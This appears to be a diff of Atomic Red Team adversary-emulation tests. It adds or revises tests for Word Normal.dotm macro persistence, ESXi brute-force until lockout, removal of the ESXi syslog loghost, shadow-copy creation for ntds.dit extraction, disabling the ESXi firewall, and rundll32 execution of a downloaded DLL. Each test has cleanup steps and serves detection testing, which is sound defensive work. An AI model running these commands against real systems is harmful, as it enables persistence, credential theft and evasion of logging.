+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule)
+          | Out-Null\n"
+        cleanup_command: "# Registry setting to \"Trust access to the VBA project
+          object model\" in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData1 = \"1\"\n$registryData0 = \"0\"\n# Defines
+          the path each flag file created depending on the original registry state\n$flagPath1
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Define the path of copied normal template for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Delete the scheduled task created by the Macro\nschtasks /Delete /TN \"OpenCalcTask\"
+          /F | Out-Null\n#Restore the orginal template if the backup copy exists\nif
+          (Test-Path $copyPath)\n{\n  #Delete the injected template\n  Remove-Item
+          -Force $docPath -ErrorAction SilentlyContinue\n  # Restore the original
+          template\n  Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction
+          SilentlyContinue\n  Write-Host \"The original template has been restored\"\n}\n
+          \ else\n{\n  Write-Host \"The original template is present\"\n}\n#Restore
+          the original state of the registry key\nif (Test-Path $flagPath1) \n{\n
+          \ # The value was originally 0, set back to 0\n  New-ItemProperty -Path
+          $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD
+          -Force | Out-Null\n  Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue\n
+          \ Write-Host \"The original registry state has been restored\"\n} \n  elseif
+          (Test-Path $flagPath2)\n{\n  #The value did not previously exist, delete
+          the value\n  Remove-ItemProperty -Path $registryKey -Name $registryValue
+          | Out-Null\n  Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue
+          | Out-Null\n  Write-Host \"The original registry state has been restored\"\n}\n
+          \ else \n{\n  # The value was already 1, do nothing\n  Write-Host \"The
+          value $registryValue already existed in $registryKey.\"\n}\n"
   T1546.009:
     technique:
       x_mitre_platforms:
@@ -61327,6 +61495,65 @@ collection:
           >nul 2>&1
 
           '
+    - name: ESXi - Remove Syslog remote IP
+      auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2
+      description: 'An adversary may edit the syslog config to remove the loghost
+        in order to prevent or redirect logs being received by SIEM.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: Username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "# Extract line with IP address from the syslog configuration output\n#{plink_file}
+          -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_get_loghost.txt
+          | findstr /r \"[0-9]*\\.[0-9]*\\.[0-9]*\\.\" > c:\\temp\\loghost.txt\n\n#
+          Replace the IP with \"0\"\n#{plink_file} -ssh #{vm_host} -l #{username}
+          -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_remove_loghost.txt\n\n#
+          Extract the IP from the line extracted from findstr\n$inputFilePath = \"c:\\temp\\loghost.txt\"\n$outputFilePath
+          = \"c:\\temp\\loghost_ip.txt\"\n\n$fileContent = Get-Content -Path $inputFilePath
+          -Raw\n\nif ([string]::IsNullOrWhiteSpace($fileContent)) {\n    Write-Host
+          \"The content is $fileContent\"\n    Write-Host \"The file is empty\"\n}
+          else {\n    # Use a regular expression to extract IP addresses\n    $ipAddresses
+          = [regex]::Matches($fileContent, '(udp|tcp):\\/\\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value\n
+          \   \n    $output = \"esxcli system syslog config set --loghost=\" + $ipAddresses\n\n
+          \   $output | Out-File -FilePath $outputFilePath -Encoding ascii\n    \n
+          \   Write-Host \"IP addresses extracted and saved to $outputFilePath\"\n}\n"
+        cleanup_command: |
+          # Re-add the initially extracted IP
+          #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+
+          rm c:\temp\loghost_ip.txt
+          rm c:\temp\loghost.txt
+        name: powershell
+        elevation_required: true
   T1113:
     technique:
       modified: '2023-03-30T21:01:39.967Z'
@@ -67129,6 +67356,46 @@ credential-access:
         command: "cd \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n.\\kerbrute.exe
           bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\\bruteuser.txt
           TestUser1 \n"
+    - name: ESXi - Brute Force Until Account Lockout
+      auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+      description: |
+        An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+        In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        lockout_threshold:
+          description: Specify the account lockout threshold configured on the ESXI
+            management server
+          type: string
+          default: '5'
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: |
+          $lockout_threshold = [int]"#{lockout_threshold}"
+          for ($var = 1; $var -le $lockout_threshold; $var++) {
+            #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+            }
+        name: powershell
+        elevation_required: false
   T1003:
     technique:
       x_mitre_platforms:
@@ -74370,6 +74637,24 @@ credential-access:
           mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         name: command_prompt
         elevation_required: true
+    - name: Create Volume Shadow Copy with diskshadow
+      auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7
+      description: |
+        This test is intended to be run on a domain controller
+        An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
+      supported_platforms:
+      - windows
+      input_arguments:
+        filename:
+          description: Location of the script
+          type: Path
+          default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt
+      executor:
+        command: |
+          mkdir c:\exfil
+          diskshadow.exe /s #{filename}
+        name: command_prompt
+        elevation_required: true
   T1558.003:
     technique:
       modified: '2023-03-30T21:01:46.538Z'

atomics/T1003.003/T1003.003.md

@@ -30,6 +30,8 @@ The following tools and techniques can be used to enumerate the NTDS file and th
 
 - [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)
 
+- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
+
 
 <br/>
 
@@ -425,4 +427,39 @@ mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - Create Volume Shadow Copy with diskshadow
+This test is intended to be run on a domain controller
+An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b385996c-0e7d-4e27-95a4-aca046b119a7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| filename | Location of the script | Path | PathToAtomicsFolder&#92;T1003.003&#92;src&#92;diskshadow.txt|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+mkdir c:\exfil
+diskshadow.exe /s #{filename}
+```
+
+
+
+
+
+
 <br/>

atomics/T1110.001/T1110.001.md

@@ -40,7 +40,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
 
 - [Atomic Test #7 - SUDO Brute Force - FreeBSD](#atomic-test-7---sudo-brute-force---freebsd)
 
-- [Atomic Test #8 - ESXi - Brute Force Until Account Lockout](#atomic-test-8---esxi-brute-force-until-account-lockout)
+- [Atomic Test #8 - ESXi - Brute Force Until Account Lockout](#atomic-test-8---esxi---brute-force-until-account-lockout)
+
 
 <br/>
 
@@ -437,11 +438,11 @@ pkg update && pkg install -y sudo curl bash
 ## Atomic Test #8 - ESXi - Brute Force Until Account Lockout
 An adversary may attempt to brute force the password of privilleged account for privilege escalation.
 In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
-  
+
 **Supported Platforms:** Windows
 
 
-**auto_generated_guid:** f0b443ae-9565-11ee-b9d1-0242ac120002
+**auto_generated_guid:** ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
 
 
 
@@ -450,30 +451,37 @@ In the process, the TA may lock the account, which can be used for detection. [R
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| vm_host | Name or IP of the ESXI host | string | atomic.local |
-| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1110.001\bin\plink.exe' |
-| lockout_threshold | Specify the account lockout threshold configured on the ESXI management server | string | 5 |
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| plink_file | Path to Putty | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| lockout_threshold | Specify the account lockout threshold configured on the ESXI management server | string | 5|
 
 
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `powershell`! 
 
 
 ```powershell
- $lockout_threshold = [int]"#{lockout_threshold}"
-      for ($var = 1; $var -le $lockout_threshold; $var++) {
-        #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
-        }
+$lockout_threshold = [int]"#{lockout_threshold}"
+for ($var = 1; $var -le $lockout_threshold; $var++) {
+  #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+  }
 ```
 
+
+
+
 #### Dependencies:  Run with `powershell`!
-##### Description: Check if plink is available.
+##### Description: The plink executable must be found in the ExternalPayloads folder.
 ##### Check Prereq Commands:
 ```powershell
 if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-  Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
 ```
 
-<br/>
+
+
+
+<br/>

atomics/T1137.001/T1137.001.md

@@ -0,0 +1,188 @@
+# T1137.001 - Office Application Startup: Office Template Macros.
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/001)
+<blockquote>Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
+
+Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
+
+Word Normal.dotm location:<br>
+<code>C:\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm</code>
+
+Excel Personal.xlsb location:<br>
+<code>C:\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</code>
+
+Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\Program Files (x86)\Microsoft Office\root\Office16\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
+
+An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell](#atomic-test-1---injecting-a-macro-into-the-word-normaldotm-template-for-persistence-via-powershell)
+
+
+<br/>
+
+## Atomic Test #1 - Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell
+Injects a Macro in the Word default template "Normal.dotm" and makes it execute each time that Word is opened. In this test, the Macro creates a sheduled task to open Calc.exe every evening.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 940db09e-80b6-4dd0-8d4d-7764f89b47a8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Registry setting to "Trust access to the VBA project object model" in Word
+$registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security"
+$registryValue = "AccessVBOM"
+$registryData = "1"
+# The path where a flag text file will be created if Registry setting did not already exist or if it was set to 0
+$flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt"
+$flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt"
+# Get the value of the Key/Value pair
+$value = (Get-ItemProperty -Path $registryKey -Name $registryValue -ErrorAction SilentlyContinue).$registryValue
+# Logical operation to: if the value of the key/value is 1, do nothing - 
+# if the value is 0, change it to 1 and create flag1 - 
+# if it doesn't exist, create the value and flag2
+if ($value -eq "1") 
+{
+  Write-Host "The registry value '$registryValue' already exists with the required setting."
+}   
+  elseif ($value -eq "0") 
+{
+  Write-Host "The registry value was set to 0, temporarily changing to 1."
+  New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null
+  echo "flag1" > $flagPath1
+} 
+  else 
+{
+  Write-Host "The registry value '$registryValue' does not exist, temporarily creating it."
+  New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null
+  echo "flag2" > $flagPath2
+}
+Add-Type -AssemblyName Microsoft.Office.Interop.Word
+# Define the path of copied normal template for restoral
+$copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm"
+# Define the path to the normal template
+$docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm"
+# Create copy of orginal template for restoral
+Copy-Item -Path $docPath -Destination $copyPath -Force
+# VBA code to be insterted as a Macro
+# Will create a scheduled task to open the Calculator at 8:04pm daily
+$vbaCode = @"
+  Sub AutoExec()
+  Dim applicationPath As String
+  Dim taskName As String
+  Dim runTime As String
+  Dim schTasksCmd As String
+  applicationPath = "C:\Windows\System32\calc.exe"
+  taskName = "OpenCalcTask"
+  runTime = "20:04"
+  schTasksCmd = "schtasks /create /tn """ & taskName & """ /tr """ & applicationPath & """ /sc daily /st " & runTime & " /f"
+  Shell "cmd.exe /c " & schTasksCmd, vbNormalFocus
+  End Sub
+"@
+# Create a new instance of Word.Application
+$word = New-Object -ComObject Word.Application
+# Keep the Word application hidden
+$word.Visible = $false
+# Open the document
+$document = $word.Documents.Open($docPath)
+# Access the VBA project of the document
+$vbaProject = $document.VBProject
+# Add a new module to the VBA project
+$newModule = $vbaProject.VBComponents.Add(1) # 1 = vbext_ct_StdModule
+# Add the VBA code to the new module
+$newModule.CodeModule.AddFromString($vbaCode)
+# Run the Macro
+$word.run("AutoExec")
+# Save and close the document
+$document.SaveAs($docPath)
+$document.Close()
+# Quit Word
+$word.Quit()
+# Release COM objects
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) | Out-Null
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) | Out-Null
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) | Out-Null
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) | Out-Null
+```
+
+#### Cleanup Commands:
+```powershell
+# Registry setting to "Trust access to the VBA project object model" in Word
+$registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security"
+$registryValue = "AccessVBOM"
+$registryData1 = "1"
+$registryData0 = "0"
+# Defines the path each flag file created depending on the original registry state
+$flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt"
+$flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt"
+# Define the path of copied normal template for restoral
+$copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm"
+# Define the path to the normal template
+$docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm"
+# Delete the scheduled task created by the Macro
+schtasks /Delete /TN "OpenCalcTask" /F | Out-Null
+#Restore the orginal template if the backup copy exists
+if (Test-Path $copyPath)
+{
+  #Delete the injected template
+  Remove-Item -Force $docPath -ErrorAction SilentlyContinue
+  # Restore the original template
+  Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction SilentlyContinue
+  Write-Host "The original template has been restored"
+}
+  else
+{
+  Write-Host "The original template is present"
+}
+#Restore the original state of the registry key
+if (Test-Path $flagPath1) 
+{
+  # The value was originally 0, set back to 0
+  New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD -Force | Out-Null
+  Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue
+  Write-Host "The original registry state has been restored"
+} 
+  elseif (Test-Path $flagPath2)
+{
+  #The value did not previously exist, delete the value
+  Remove-ItemProperty -Path $registryKey -Name $registryValue | Out-Null
+  Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue | Out-Null
+  Write-Host "The original registry state has been restored"
+}
+  else 
+{
+  # The value was already 1, do nothing
+  Write-Host "The value $registryValue already existed in $registryKey."
+}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Microsoft Word must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+  New-Object -COMObject "Word.Application" | Out-Null
+  Stop-Process -Name "winword"
+  exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Word manually to meet this requirement"
+```
+
+
+
+
+<br/>

atomics/T1218.011/T1218.011.md

@@ -38,6 +38,8 @@ Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techni
 
 - [Atomic Test #13 - Rundll32 with desk.cpl](#atomic-test-13---rundll32-with-deskcpl)
 
+- [Atomic Test #14 - Running DLL with .init extension and function](#atomic-test-14---running-dll-with-init-extension-and-function)
+
 
 <br/>
 
@@ -590,4 +592,52 @@ del not_an_scr.scr
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #14 - Running DLL with .init extension and function
+This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
+DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2d5029f0-ae20-446f-8811-e7511b58e8b6
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_file | The DLL file to be called | string | PathToAtomicsFolder&#92;T1218.011&#92;bin&#92;_WT.init|
+| dll_url | The URL to the DLL file that must be downloaded | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+rundll32.exe #{dll_file},krnl
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The DLL file to be called must exist at the specified location (#{dll_file})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+```
+
+
+
+
 <br/>

atomics/T1560.001/T1560.001.md

@@ -28,7 +28,8 @@ Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZi
 
 - [Atomic Test #9 - Encrypts collected data with AES-256 and Base64](#atomic-test-9---encrypts-collected-data-with-aes-256-and-base64)
 
-- [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi-remove-syslog-remote-ip)
+- [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi---remove-syslog-remote-ip)
+
 
 <br/>
 
@@ -506,12 +507,12 @@ if [ ! -d #{input_folder} ]; then mkdir -p #{input_folder}; cd #{input_folder};
 <br/>
 
 ## Atomic Test #10 - ESXi - Remove Syslog remote IP
-    An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM.
+An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM.
 
 **Supported Platforms:** Windows
 
 
-**auto_generated_guid:** 8241dda4-962e-11ee-b9d1-0242ac120002
+**auto_generated_guid:** 36c62584-d360-41d6-886f-d194654be7c2
 
 
 
@@ -520,65 +521,67 @@ if [ ! -d #{input_folder} ]; then mkdir -p #{input_folder}; cd #{input_folder};
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| vm_host | Name or IP of the ESXI host | string | atomic.local |
-| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1560.001\bin\plink.exe' |
-| username | Username used to log into ESXi | string | root |
-| password | Password used to log into ESXI | string | n/a |
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| plink_file | Path to Putty | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| username | Username used to log into ESXi | string | root|
+| password | password used to log into ESXI | string | n/a|
 
-#### Attack Commands: Run with `powershell`! 
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
 
 
 ```powershell
-  # Extract line with IP address from the syslog configuration output
-  #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt
+# Extract line with IP address from the syslog configuration output
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt
 
-  # Replace the IP with "0"
-  #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt
+# Replace the IP with "0"
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt
 
-  # Extract the IP from the line extracted from findstr
-  $inputFilePath = "c:\temp\loghost.txt"
-  $outputFilePath = "c:\temp\loghost_ip.txt"
+# Extract the IP from the line extracted from findstr
+$inputFilePath = "c:\temp\loghost.txt"
+$outputFilePath = "c:\temp\loghost_ip.txt"
 
-  $fileContent = Get-Content -Path $inputFilePath -Raw
+$fileContent = Get-Content -Path $inputFilePath -Raw
 
-  if ([string]::IsNullOrWhiteSpace($fileContent)) {
-      Write-Host "The content is $fileContent"
-      Write-Host "The file is empty"
-  } else {
-      # Use a regular expression to extract IP addresses
-      $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value
-      
-      $output = "esxcli system syslog config set --loghost=" + $ipAddresses
+if ([string]::IsNullOrWhiteSpace($fileContent)) {
+    Write-Host "The content is $fileContent"
+    Write-Host "The file is empty"
+} else {
+    # Use a regular expression to extract IP addresses
+    $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value
+    
+    $output = "esxcli system syslog config set --loghost=" + $ipAddresses
 
-      $output | Out-File -FilePath $outputFilePath -Encoding ascii
-      
-      Write-Host "IP addresses extracted and saved to $outputFilePath"
+    $output | Out-File -FilePath $outputFilePath -Encoding ascii
+    
+    Write-Host "IP addresses extracted and saved to $outputFilePath"
 }
 ```
 
 #### Cleanup Commands:
 ```powershell
-  # Re-add the initially extracted IP
-  #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
-  
-  rm c:\temp\loghost_ip.txt
-  rm c:\temp\loghost.txt
+# Re-add the initially extracted IP
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+
+rm c:\temp\loghost_ip.txt
+rm c:\temp\loghost.txt
 ```
 
 
 
 #### Dependencies:  Run with `powershell`!
-##### Description: Check if plink is available.
+##### Description: The plink executable must be found in the ExternalPayloads folder.
 ##### Check Prereq Commands:
 ```powershell
 if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-  Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
 ```
 
 
 
 
-<br/>
+<br/>

atomics/T1562.004/T1562.004.md

@@ -50,7 +50,8 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
 
 - [Atomic Test #22 - Blackbit - Disable Windows Firewall using netsh firewall](#atomic-test-22---blackbit---disable-windows-firewall-using-netsh-firewall)
 
-- [Atomic Test #23 - ESXi - Disable Firewall via Esxcli](#atomic-test-23---esxi-disable-firewall-via-esxcli)
+- [Atomic Test #23 - ESXi - Disable Firewall via Esxcli](#atomic-test-23---esxi---disable-firewall-via-esxcli)
+
 
 <br/>
 
@@ -972,12 +973,12 @@ netsh firewall set opmode mode=enable >nul 2>&1
 <br/>
 
 ## Atomic Test #23 - ESXi - Disable Firewall via Esxcli
-    Adversaries may disable the ESXI firewall via ESXCLI
+Adversaries may disable the ESXI firewall via ESXCLI
 
 **Supported Platforms:** Windows
 
 
-**auto_generated_guid:** 8710d396-96e5-11ee-b9d1-0242ac120002 
+**auto_generated_guid:** bac8a340-be64-4491-a0cc-0985cb227f5a
 
 
 
@@ -986,34 +987,39 @@ netsh firewall set opmode mode=enable >nul 2>&1
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| vm_host | Name or IP of the ESXI host | string | atomic.local |
-| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1562.004\bin\plink.exe' |
-| username | Username used to log into ESXi | string | root |
-| password | Password used to log into ESXI | string | n/a |
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| plink_file | Path to Putty | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| username | username used to log into ESXi | string | root|
+| password | password used to log into ESXI | string | n/a|
 
-#### Attack Commands: Run with `powershell`! 
+
+#### Attack Commands: Run with `command_prompt`! 
 
 
 ```cmd
-  #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
 ```
 
 #### Cleanup Commands:
 ```cmd
-  #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
 ```
 
 
 
